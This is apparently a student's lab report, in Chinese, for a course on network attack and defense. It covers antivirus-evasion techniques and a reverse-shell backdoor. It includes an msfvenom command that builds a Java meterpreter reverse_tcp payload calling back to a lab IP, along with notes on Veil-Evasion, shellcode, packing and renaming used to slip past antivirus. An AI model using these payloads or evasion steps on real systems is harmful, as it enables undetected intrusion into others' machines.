2017-2018-4 20155203《網絡對抗技術》Exp3 免殺原理與實踐

1.基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？
分析惡意程序的行爲特徵，分析其代碼流將其性質歸類於惡意代碼

（2）免殺是作什麼？
使惡意代碼避免被查殺，也就是要掩蓋惡意代碼的特徵

（3）免殺的基本方法有哪些？
免殺大概能夠分爲兩種狀況：

1. 二進制的免殺（無源碼），只能經過經過修改asm代碼／二進制數據／其餘數據來完成免殺。
2. 有源碼的免殺，能夠經過修改源代碼來完成免殺，也能夠結合二進制免殺的技術。

免殺也能夠分爲這兩種狀況：

1. 靜態文件免殺，被殺毒軟件病毒庫/雲查殺了，也就是文件特徵碼在病毒庫了。
2. 動態行爲免殺，運行中執行的某些行爲被殺毒軟件攔截報讀。

2.實踐過程記錄

2.1 正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧；

- 首先先把上次的後門放在virscan.org上檢測一下。

- 生成jar

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.230.144 lport=5203 x> dkxshell.jar

- 下載veil-evasion:

不少人這裏可能會出問題，這裏推薦一個源：kali國內更新源。更換你的源，並按照這個更新源教程操做更新你的源，而後按照veil安裝教程按照veil使用教程找一個網快且穩定的地方作，中間出現什麼錯誤先不要管，只要運行的時候能看到「2 tools ...」"41 payload..."就能夠用啦(這句話裏不少連接由於模板問題，沒有標註，在全文最後有總結).可能你們在安裝後再次打開的時候會發現，還須要下載，這個時候輸入n（NO）若是報錯，就打開/tools/Veil/，運行Veil.py，應該就成功啦。

把Veil生成的小程序放在Win10下，哇厲害了個人電腦管家~

這個安裝半天的免殺平臺查殺率仍是很高，失去假笑。。。

- shellcode編程

能夠看到查殺的機率仍是很高的

- 用C語言編的shellcode攻擊win10

是這樣的我只能在win10上下載VS（相信你們也不能在Win7上安裝）因此我關閉了防火牆、殺毒軟件，先ping通，回連成功！

- linux交叉編譯

- 加殼

機率很高嘛，一會嘗試一下壓縮veil的可執行文件

2.2 經過組合應用各類技術實現惡意代碼免殺

- 加殼+veil-evasion

哇好優秀啊，只有這麼一點點，但是個人電腦管家更優秀，我剛放進去就被它識別了，但是我很懷疑，因而我就給它改了個名字。。。而後win10的電腦管家就識別不了了，但win7的電腦管家能夠。。。保持假笑。。。我再改（memedadkx）！成了。

• 2.3 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

  這個任務和上面那個有什麼區別呢。。。
  版本：
  

3.離實戰還缺些什麼技術或步驟？

你們如今用這種很是初級的Win7的已經不多，並且都會用殺毒軟件按期清理查殺，成功的機率要更小。並且免殺的方法並不具備普適性，還須要改進

4.實踐總結與體會

Veil-evasion安裝教程總結：

• kali國內更新源
• 更新源更新教程
• veil安裝教程
• veil使用教程